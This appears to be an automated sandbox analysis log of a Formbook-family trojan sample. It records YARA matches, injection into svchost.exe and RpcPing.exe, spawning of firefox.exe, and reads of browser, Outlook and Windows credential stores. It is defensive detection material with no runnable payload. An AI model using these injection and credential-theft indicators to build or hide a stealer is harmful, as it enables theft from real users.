            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: String function: 00770D27 appears 70 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: String function: 00778B40 appears 42 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: String function: 00757F41 appears 35 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03537E54 appears 111 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 0356F290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 034DB970 appears 280 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 0355EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03525130 appears 58 times
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2099822981.0000000003CB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100662687.0000000003E5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BA2D5 GetLastError,FormatMessageW,0_2_007BA2D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A8713 AdjustTokenPrivileges,CloseHandle,0_2_007A8713
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007A8CC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007BB59E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007CF121
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_007BC602
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00754FE9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeFile created: C:\Users\user\AppData\Local\Temp\aut9784.tmpJump to behavior
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RpcPing.exe, 00000009.00000003.2983637065.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2983493230.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.000000000310D000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"Jump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic file information: File size 1208832 > 1048576
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007CC304 LoadLibraryA,GetProcAddress,0_2_007CC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0075C590 push eax; retn 0075h0_2_0075C599
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00778B85 push ecx; ret 0_2_00778B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004190A0 push esp; ret 2_2_004190B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408926 push ebx; iretd 2_2_0040892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D99B pushad ; ret 2_2_0040D99C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB96 push FFFFFF8Fh; retf 2_2_0041EB9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CAC pushfd ; retf 2_2_00411CB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CBF push 3E557F42h; ret 2_2_00411CC4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004075A7 push 67C9EEB0h; retf 2_2_004075B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0225F pushad ; ret 2_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C027FA pushad ; ret 2_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0283D push eax; iretd 2_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01368 push eax; iretd 2_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01065 push edi; ret 2_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C018F3 push edx; iretd 2_2_03C01906
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B225F pushad ; ret 9_2_034B27F9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B27FA pushad ; ret 9_2_034B27F9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034E09AD push ecx; mov dword ptr [esp], ecx9_2_034E09B6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B283D push eax; iretd 9_2_034B2858
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_034B135E push eax; iretd 9_2_034B1369
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C84034 push 67C9EEB0h; retf 9_2_02C8403E
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9C1B7 push ebx; ret 9_2_02C9C1C7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C926B7 push ebp; ret 9_2_02C926C2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C92799 push edx; retf 9_2_02C9279A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8E74C push 3E557F42h; ret 9_2_02C8E751
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8E739 pushfd ; retf 9_2_02C8E745
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C853B3 push ebx; iretd 9_2_02C853B7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C8D360 push FFFFFFF6h; retf 9_2_02C8D36D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9B623 push FFFFFF8Fh; retf 9_2_02C9B627
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007D55FD
